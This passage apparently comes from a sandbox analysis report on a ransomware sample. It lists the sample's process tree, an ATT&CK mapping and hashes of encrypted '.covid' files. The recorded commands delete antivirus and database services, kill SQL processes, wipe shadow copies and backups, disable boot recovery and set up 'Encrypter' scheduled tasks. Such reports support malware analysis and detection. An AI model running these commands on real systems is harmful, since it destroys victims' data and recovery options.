PID:2720

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL$WOLTERSKLUWER"
3⤵
PID:4048

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$PROGID"
3⤵
PID:3888

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$WOLTERSKLUWER"
3⤵
PID:2596

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher$OPTIMA"
3⤵
PID:3972

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL$OPTIMA"
3⤵
PID:1076

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$OPTIMA"
3⤵
PID:3768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ReportServer$OPTIMA"
3⤵
PID:3904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "msftesql$SQLEXPRESS"
3⤵
PID:3296

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "postgresql-x64-9.4"
3⤵
PID:3852

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Webroot"
3⤵
PID:3780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "WRSVC"
3⤵
PID:3848

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "AV: ESET"
3⤵
PID:2716

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ekrn"
3⤵
PID:3060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Kaspersky"
3⤵
PID:2952

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klim6"
3⤵
PID:2320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "AVP18.0.0"
3⤵
PID:2228

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "KLIF"
3⤵
PID:3216

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klpd"
3⤵
PID:3076

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klflt"
3⤵
PID:2424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klbackupdisk"
3⤵
PID:3728

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klbackupflt"
3⤵
PID:3184

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klkbdflt"
3⤵
PID:2528

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klmouflt"
3⤵
PID:916

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "klhk"
3⤵
PID:3744

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "KSDE1.0.0"
3⤵
PID:3776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "kltap"
3⤵
PID:2988

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "AV: Trend Micro"
3⤵
PID:3424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TmFilter"
3⤵
PID:2276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TMLWCSService"
3⤵
PID:1316

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "tmusa"
3⤵
PID:1360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TmPreFilter"
3⤵
PID:1636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TMSmartRelayService"
3⤵
PID:2544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TMiCRCScanService"
3⤵
PID:4004

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "VSApiNt"
3⤵
PID:2384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TmCCSF"
3⤵
PID:3064

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "tmlisten"
3⤵
PID:2704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TmProxy"
3⤵
PID:3292

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ntrtscan"
3⤵
PID:3128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ofcservice"
3⤵
PID:3784

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "UniFi"
3⤵
PID:3164

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Kill "SQL"
3⤵
PID:1056

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlbrowser.exe
3⤵
PID:3812

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlwriter.exe
3⤵
PID:3192

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe
3⤵
PID:3080

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im msmdsrv.exe
3⤵
PID:3492

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im MsDtsSrvr.exe
3⤵
PID:4088

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlceip.exe
3⤵
PID:2084

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe
3⤵
PID:3516

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im Ssms.exe
3⤵
PID:4032

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im SQLAGENT.EXE
3⤵
PID:3800

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im fdhost.exe
3⤵
PID:484

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im fdlauncher.exe
3⤵
PID:1916

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im sqlservr.exe
3⤵
PID:1944

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im ReportingServicesService.exe
3⤵
PID:2064

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im msftesql.exe
3⤵
PID:2140

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im pg_ctl.exe
3⤵
PID:876

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im postgres.exe
3⤵
PID:964

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Kill
3⤵
PID:1608

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" taskkill -f -im UniFi.exe
3⤵
PID:3112

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq MsMpEng.exe" | find /c "PID" && Echo Windows Defender
3⤵
PID:2652

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq ntrtscan.exe" | find /c "PID" && Echo Trend Micro Security
3⤵
PID:2396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq avp.exe" | find /c "PID" && Echo Kaspersky Endpoint Security
3⤵
PID:472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq WRSA.exe" | find /c "PID" && Echo Webroot
3⤵
PID:3244

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq egui.exe" | find /c "PID" && Echo ESET
3⤵
PID:2656

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" tasklist /fi "imagename eq AvastUI.exe" | find /c "PID" && Echo Avast
3⤵
PID:2136

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" vssadmin.exe Delete Shadows /All /Quiet
3⤵
PID:2120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet
3⤵
PID:2020

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:2980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No
3⤵
PID:1976

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
3⤵
PID:1852

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP
3⤵
PID:2352

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE
3⤵
PID:2848

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic SHADOWCOPY DELETE
4⤵
PID:2792

C:\Windows\SysWOW64\wbem\WMIC.exe
"C:\Windows\System32\wbem\WMIC.exe" wmic SHADOWCOPY DELETE
3⤵
PID:2200

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Encrypter /TR C:\Users\Admin\AppData\Roaming\norapid.exe
3⤵
- Creates scheduled task(s)
PID:3684

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC ONLOGON /TN EncrypterSt /TR C:\Users\Admin\AppData\Roaming\norapid.exe
3⤵
- Creates scheduled task(s)
PID:2376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\rapidrecovery.txt.txt
3⤵
PID:1964

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1644

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x578
1⤵
PID:1016

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:3156

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\!files-recovery.txt
1⤵
PID:2028

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\434TNJ1GSG.covid
MD5
aa85650cb26c5f98a7ce7916ac821a11

SHA1
23b0e998f6bcd656c93d71845872e698bd850ee2

SHA256
4a89fc627df8c7b1876add49266a8581b824a06802ef5efa60f3ed59a626e2a0

SHA512
2540a3c650c8c0b814465b6a4fc5c2d05001fb5bc91efbc378ed68f403640b135ae7378baf292a29cbb60269344713da2970db7ba70cc18ed1ac1d17d4619755

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\IML5HAY764.covid
MD5
d5264102ecc33527ef7291b58f7aa225

SHA1
ece9907384e0a401e6492bed46cf98568362e899

SHA256
0b137456be947d8d9f2ff075780e9bcc0f5c48bad9f860312afd6bcb1f8dabf4

SHA512
0f080d2c9056df1070e399284701b48d34388ef3179c71c9547a8bcab423db85dc3594d013d0feeec86d8d30dd041de67eb12fd60ea393b4133a937af8892cec

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\ZW1JJEE1JA.covid
MD5
b2645f4505f0b0820204c6339309957c

SHA1
dbbf269cbcf989e684782fe189ec74ece210af4c

SHA256
c9ccd9aaf653799dd29c47195b787f56b7dd64c5f57b82dc2d63e81f7fdb8008

SHA512
08638285092e85b179ba90d403b38f1c0aa16121c81025bc6d3c2ebda8cdfadcd8518dc92b66ffe0e78da54ed059960bde4b7576db8e527125c16199f9c38343

Download Submit
C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\ZXGRCG3WKI.covid
MD5
617dcdd855ef9fd95700df2965f9f56b

SHA1
1104f24ee9c507e1df7b9b908e286d9d69f7ca6b

SHA256
328270ad285a26c7ebb03eca3a7a803bd5a3ffabf14ca33b7fedb7824bd51b23

SHA512
7a40de177b2571c034f5cca3e29e6ad061fade2d6992f5fc83c780b49668e2037555714c8c5ccd38eaf6a67ea79543793440d9dadc8ce2a1fddb049c5c7fa6f8

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\5YAIZ5QT3X.covid
MD5
ac8e4b6d704dddb7b83ced4bf7051569

SHA1
7440f056ec5e3d6a915a6d3b1dfff253f0a6ddef

SHA256
969e1bbee94e0f69cf2caac05ffc5583161a8913c1e2c368d043bf7a84d7a35f

SHA512
5f699140b7b22dc68ca823ffea496450df2a1e256cab6b91279cb538dad5d47527a61b1ffad74d5ef85b6d6bb3063a0b5b7fe4f21377d79fb54a047030540c3d

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\O3J71568VP.covid
MD5
e9fd23dcd136a199c4f068ed8f4f66bf

SHA1
37e6ddcfbcca8f3ebe7057289ee4332528c9075b

SHA256
db2fd3ae683033cae6f83cf3db666d5853148ea4350fc358cf1023fa8b938dda

SHA512
7ad25ca94e63d129a42e91826fc486a8179708cb031a64fe31b9785e0fbc8c7465e604e93d7f31e797dbc0dda8d0a6dc32c70f8645af0f0291b3b98b43654949

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\4A6J5N4ESJ.covid
MD5
505160aed783e1158916976b7aaf9248

SHA1
90f78380338e25a5ef9504b67cafe85bba887692

SHA256
05e16a6bf4d0eb0f13e553e15e65f3327bd0509337b11e940f3e32ee4a35e64c

SHA512
a330a31c73c63530062b1f1fe425ce47a5b3197e42a949420086263f4fa1bf5e5012dd95e5172d971d70fec8514d4aea0f26c52bb62a21a8fbf93339542479a6

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\C15D438R84.covid
MD5
9f7646c54f2c84d6b5d65d5442aa759c

SHA1
5195d497f224e43bf7c13031158ee18382f8c5ac

SHA256
3dfcb716e2ed1fe007e5719d9274339ca13c907f21de82aebc5edd6b2377da6d

SHA512
a131c4f7e51bdce2e5bf0cbc43c7e81192fd515f60eac83265b757f1caea5290470a3bf3239a7b2d1f14f7e572b3caa48c64ca55b68989434c50c37218d42d6a

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\WB7JZH5V83.covid
MD5
bbbca6125eb5701811d0e818472f7372

SHA1
6a84cc8168feee1ff77323ca9063cb9b80d4a6a7

SHA256
f5f8c62279c0f8f07c88e4fd739c7b962c36490e234d3aa2022b664fc4479a2a

SHA512
544e56464c5a5f7ac6e5782763eaaa645b5560509d411c91273e284c83e2cda27d725c86329ae47a9c7fff57755bebe593fad81c9d50bae70b6b75291a203242

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\1A36BUHJER.covid
MD5
06221d67e9ba9a691c3d78450c77ad8d

SHA1
9db0715160bac64e3d0bff8ad47cb6c68d926333

SHA256
4d5e5f4196486ec7c5305746a907277c5f8db073e9cf5650d7bfb4505e0ae1ec

SHA512
cf9fc287d567d5e0bd040ecce0317145110eee320fc742fd7d9ddfdbc67047455acfe4a1828ec482b177d9a13601950c3147218a76dc785cc3505d36d2ea27d8

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\IT4HNUHSFD.covid
MD5
38e48cc82e63766acf2220c78ad514af

SHA1
cb702b3b262e39d9ce300cfaa632e7ed6bdd6510

SHA256
a41bc426337b00785a3ba38452467961c35c8616a1ff8a591e5a500a5c6205e4

SHA512
c71528f69e807abb9fd608f7d9228eb0179b1e94c04ce0041f696d432dbfbcd3cb2a881c7f0f5a2d8ffbc83b4bfb33f0f80cb1ff3c5331a3d80fccb13e234178

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\ZE4QWLIOHL.covid
MD5
4c13df9cbbe352665868b77f5d6709de

SHA1
9a9f18e27b938fc2c633f265803cc47ced4cc7e6

SHA256
cc0fb2f526f9e10f01842764eb30c3c8134289992a11c9c9d642d6f9c9040297

SHA512
e4d6f39318662fc2b41ac660c3f9c7f0c1ca19d57fbba75bb8d53989a3e1230c961e447b6212c04888a145c4a711aee0003f0387c355d2edc6ad97e4b4d62da9

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\CBQB1XV47G.covid
MD5
c59c6447738c1dd73dca8bc65a3a5f20

SHA1
0151ec3a165e47de2aaef167087cedcb774a32fe

SHA256
67fa87e5111bb066b76a75295f3ecfeb80a7103cb0d7a53f1ca313629aa08691

SHA512
25119d962d466a63e7397917dafb830bd6a4c4c12550e363d692dd5c3245a263f389cb4861bc0eeb7e59d7113c6ee34addf849a9403476a3ee2d31170b22eff3

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\TIT2AY7OFZ.covid
MD5
08fba42dba127e96feddace9df7ee438

SHA1
149006a9cc50bc2538705eb63bda4ae5098899c3

SHA256
715b864408b72bfc0d8cbe028516466f48c983c1fd71da7bac4d6842821d611a

SHA512
55c7f513acc8b0e6f6fd7258e70fdbb0a40e9a107f2b785d30bb9759cd151dfc96e2af81cf1e7fb381fb7138646daa02354f1cea145d0524182548d6591d758e

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\X7YEGRMLQE.covid
MD5
0d05ffd69d2e4dcabe0dd45633e48e7a

SHA1
84302facb17819b26f48a11fdc4eb8ac577484b4

SHA256
b98a409a86427953fc8e93845b40b8836de63d8abd4d0084d971b3b01647fe8e

SHA512
ff3538436c3477795985a1921653cedac83156c4423f60926a8065910da394f7b9f3222bb46c1ec633346505b793b480a9b8086e00ee2ddc5e2e68143d8ac753

Download Submit
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\VNJNTBLANY.covid
MD5
33181d6ba3c0611332374899d2926e98

SHA1
3e29ee903cae1ceedd1f2326da4e2f9949da3330

SHA256
605349fe4e6dacc03476fa8c6f9cca4df5220cb6060f59e8ae51691d3f9570bc

SHA512
4d4f1e7119e175746dacdf4cd2991017075701ec140b0c8fa4714ccec085a39b8d082c0ab79bb4baf84b3f493fd4466f0f6b38dcd78a3cecbfef61f5dc0faa25

Download Submit
C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\2QV3IBKVP7.covid
MD5
0379f9eb87e7cf503450fb6ccfe7faa9

SHA1
641ffdfce36c0f59bec36ca14c08966cdfb7e337

SHA256
bd3f4e37c90870d9bff74db2e2d2f1439f8ea4d548ad669f4de0e274ad7ce4dc

SHA512
f8cd9d1076724fc39e77080380d61cecfac266bc3c6686e24861504b60e5bd5341464a0d02a0d9a878a20776e9ad05898c89680afda8ff47d4e5df564da959ca

Download Submit
C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\8IQAF5I1XT.covid
MD5
85ebd2acb400f271138c0bd4ad070127

SHA1
cee67d51fe6368ff391aefc1399591be099959c6

SHA256
db961a8214150d653815807aa12824f325364ad28d7c92fa0f4fc932115f8ca5

SHA512
ad8b13f2e60ec6fc84e5fb290a8c35b959293df51b2be2a8726170f3b20555a7063046a46a9201a738f67ba21b2054f709c75b04e5dd8daa7e1abb833de20231

Download Submit
C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\I7TL3RUG1K.covid
MD5
d20763622e4916e1d2836e1b6dddc90a

SHA1
6b5a6da1e8eeea31d9124907e686f1ece8be9b76

SHA256
125554eef2422dd952afd9ae04df92b92b299b2d833ec67c04a9fc5abf773dd4

SHA512
c5e1b8d9df19ccb0b3ab98110b961d9c21765c63bdfa9d6f02294d4a8c40c34eb40d2274edc2a3e5da85b200469f6c3df777541907e078555194f61a90561920

Download Submit
C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\TLGNCVZ37S.covid
MD5
6b9051c464c4acf913871ba3aea9c1c8

SHA1
0c170ee7d4dae55468d157dd064d70ef6d1e7f79

SHA256
4e0548e2e0418fe798b536fa5560bef08172e77aa76aeca64b323c3938ff9731

SHA512
e652d93b03884d929646520427eedbc88e40a2002edaf287164ec8f9e8f95cd340c4f7be8b143d12504239868c9c07da21ceff513b2a43e0165e0d0a7d9b6e96

Download Submit
C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\4LH2355B4M.covid
MD5
8eca077520fd2f6f5d2e286720c1c48c

SHA1
64de708f02881ff2c9cc321b02ca27b7ec8d3394

SHA256
c6bab8f6c95201f540228b2d1ae92ad8425d922fefd61fb7f568e7f45bbe78af

SHA512
1ba5b54de8d767c4f57bbeff226f1e866f9b3d4257c3c0baf32bddd54f166a03f93307017c6fb2bcc871a9771a3870442502b06627bc17330266096f26d6fadd

Download Submit
C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\I5L51FC8GX.covid
MD5
215373608900deadbeb47822096e2966

SHA1
743988077d7c98ca669624cb7ec77ed53be68c25

SHA256
19fc3eb5acb928a176d5006e2a101207da47c06812e2aaf7630405b5bb926c42

SHA512
d57998a8a707c22e029db8e85461528ffe0cf6ceb70be555c57ebed9e276781d9cb03a5f8c09bd25d47477fbcc7209054dd5eaa36a91f05697dc17a0b0ab1ec3

Download Submit
C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\Q5PERPZCTQ.covid
MD5
e61b00d1b6284fae6d9a94c7808887e6

SHA1
d60d4316666e178074068546042b69e135348fbd

SHA256
da816ac416e8d9d97845496aced26836126f1f97a089f18cdef5e13aa6b69cad

SHA512
adeacc9d47f787f8488aa9a4cad8f9c6cee6a8a513ecb6846ee5265f904df6be96a936da0fcdd083cdea64d43a034d3ceef59ac12f0abf89630194e9e9a63fbe

Download Submit
C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\XP57OPTB6W.covid
MD5
1b6afc8152c028b2a3181c883b7b603c

SHA1
6b08469e0951fee578649088ba0c8983285e91c0

SHA256
9b8a95cbfd57ec6dae94286e40a36c7591c5ef8b49de384794495caf8edb07bf

SHA512
2dd78ff4a0fae6e2460e739d114c22970ea576269edde5b22267e23ba7bea82f2322b2f65959051e975342be5fb3c21c9c7c7833801b3d380c79e0a6f48d50c6

Download Submit
C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\H4K4XH8Q7X.covid
MD5
f874ac84243cc916be2f68a272ed5242

SHA1
988f07cac1615eeeaebbe9c8ba7d04994968c2bb

SHA256
1dd6090c084adf6c0d7f0f8722ee12b79fbee7c3078398fcda085e27c7b8acff

SHA512
27b12de9fce9b8c37d4e2a64810fe037f3c6e44b8dd173a4d6d5e2f2cdeb7cf221d6ecb0d76003fffd0177c174ea242b6b2cea0fd46b689cf84ced1ebddae03f

Download Submit
C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\SPW5FPAZ41.covid
MD5
4f0e7ba60b21cf987340c4824b4b187c

SHA1
edfe8de959e00d1405582f50742e11425d5bbe94

SHA256
b195432cc1dabe373fa5d50c7c95d7ff086876a1c9cce4d732220951ac57be53

SHA512
8633dd99fca8b465f51681dc31e2e8303bf44a934d33466e34483a10068d9eafc6b493c4532ad26d822ce7939bb9d6222c8172b6d0ae30883424fb74feb007ee

Download Submit
C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\VG1NXN2U2R.covid
MD5
d67693117a125a9bce0c667c8c2ce6b6

SHA1
f8ae8ae56790debac4d3ea600d082793f9469331

SHA256
30bb93b415c098e26e80fe4ae032b014017fd02bdb7a06dc63d63e130d01b8f0

SHA512
d75e96a7ef676b5edcf2662ab02d19ee1470adcc073fe267d3f55357571faee96f4870e82531a610394c1d46be8fa019586f2a7d6f40e18bde73dc61c8d6d363

Download Submit
C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\YKXZG1VMRT.covid
MD5
b39a4372b59a2561c8b820ba88e77e9e

SHA1
498f2d01b3bbea9bbfe07b27bea3a38b175f4f64

SHA256
955d96c3121ce8f9d0d6c157055ad6cda13246a3ff9f880f7652bd69047c6550

SHA512
26977fc43c02e9541a7af794a596ef0f21a3d3578bf8dffc82e2b92692eca0d89c02ad78b1f9978bea6ea973be71da4483a02629ca898d80af3183697132e34e

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\LAF6XBELIR.covid
MD5
83df7cfa06b567706acf6fc3729fb203

SHA1
39e3f206c38b4a949e29f083390a20a62a66184f

SHA256
76a042a4a82f5b68598ea36fcf67acd2317d59a7618ea2fc7d07f83b59ca849b

SHA512
8e3a153b71939a331ad9232683c45eeefe0329e0d1c60e28720dd2533542b869cb6a40efc00ffdee83ee9c73f23f688b0d7a16cdf73905d0424919cfb6c7991e

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\4A6J5N4ESJ.covid
MD5
c4a5d86b1d930c9bb0f88cdc727f9944

SHA1
7d27f9ac2adfa3b61ddf586b918371becaf6ff15

SHA256
679e9cf0ee06a780000849f1b62272bcd117df6e98c9dc1ed6f79a33882afeb1

SHA512
9829a63b9d57d609a3faf055fe6a432508650ef51bdb3e0405a4b0b1a7c320b0de9e0c11b5662ce450a06b9f4d916458dc9fa4ad9d0e58f15dcf58578125c39a

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\C15D438R84.covid
MD5
11c20a495919b53c4dc752eab8b7cb3d

SHA1
2a5224db134861028cce548e7b597ee4dbd3e449

SHA256
4941f628ae0ff3346d058bdc3e65aee7b8249a2110eca5cface54a350fee5d8e

SHA512
bd165e0a97d47dd464c36675c952b8a6ecd412fe773697c5f28d24bfebe8a1b284019a121cf391e23543eaced5d6668d14836ffaf601f6e5d0bb274b0741f3f3

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\CBQB1XV47G.covid
MD5
372a1f8248acb5faeaeb49e2d31e6f63

SHA1
2d00e03da09a318cac6028e80cd42942c4a5e320

SHA256
1277f91a0109c1ba222d1ec3681d77623d3fd7665b632e0a4d9b2c6269be0b2d

SHA512
9077effe7a58fc1203f99179d2b2e0faa8bf03728c87444f6ea17f792aff176bf4e776c1e62fdbd07a8a3b25cb1e1ff89a0921da787dcf5727c693423380a32a

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\FFPK1CD3TO.covid
MD5
04206500c1a6221f664ed9d1ce841cd4

SHA1
744e6ce7ffcd3edb0a2986759f336fca5c1d4204

SHA256
c1324c56453fb1ced2b55bf2d50a65f119b9478ad294a12a632ed6fe12047ea0

SHA512
543ad3f4da7dc2cfdbb24299c335c24ca179f9394cec67cf64a41ce6dc8a5d418c953d28832426497e92e95170cb54286f3bdf16978e55c87a82984904c56dc7

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\IFM61QMZPM.covid
MD5
afdd33a2e4d062a077b1097ecb61c0f7

SHA1
cf49eb69fcd3ee5e695dd5830ad23e9e996347d9

SHA256
98c1945aa124376dbab29dcba3a3dc1ce141c0419d95a5a3514a95d045763482

SHA512
2b5ec2158948354fb63574fe174387c9f3210de927aab471082dd39d310edfc4c7f7ccd4a1b3c1494bdd33045c3ec844fef5211ff40fd83018743ca2474819f6

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\IPFY2ZE1IS.covid
MD5
5df940fe249dfedd559ddc44c6d6e67a

SHA1
589a395838ee9b5914dc55a371cd4c7f253fba2d

SHA256
b5da28d621537dad01acbb15d1d4ffe7685fce09fd841af9deeffab84ec00836

SHA512
336ed5f6196b761dab8db9545e7fd20e72fa112494b00c824962c55358d7c43ed10a2e78a7196ff26bc52c1d307ab35305cb63b731ed834f102268837e285765

Download Submit
C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\LJM5WIC7Z1.covid
MD5
ce6ea14df3ef1911034228ba9621bf5b

SHA1
f327154d006a5d2295fcf822db0d9d0b4be115fc

SHA256
773c0f528cf1ab013e31065c6e5a0fde697be0d3d8b9beb3efa58cf610d8d42d

SHA512
